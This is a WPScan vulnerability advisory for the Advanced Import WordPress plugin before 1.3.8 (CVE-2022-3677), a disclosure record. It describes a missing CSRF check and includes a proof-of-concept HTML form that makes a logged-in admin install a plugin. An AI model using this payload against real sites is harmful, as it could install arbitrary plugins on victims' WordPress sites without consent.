WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Advanced Import < 1.3.8 - Arbitrary Plugin Installation & Activation via CSRF

Description

The plugin does not have CSRF check when installing and activating plugins, which could allow attackers to make a logged in admin install arbitrary plugins from WordPress.org, and activate arbitrary ones from the blog via CSRF attacks

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin-ajax.php?action=install_plugin" method="POST">
    <input type="text" name="slug" value="hello-dolly">
    <input type="text" name="plugin" value="hello-dolly/hello.php">
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

advanced-import
Fixed in version 1.3.8

References

CVE
CVE-2022-3677

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID
5a7c6367-a3e6-4411-8865-2a9dbc9f1450

Timeline

Publicly Published

2022-11-14 (about 4 months ago)

Added

2022-11-14 (about 4 months ago)

Last Updated

2022-11-14 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin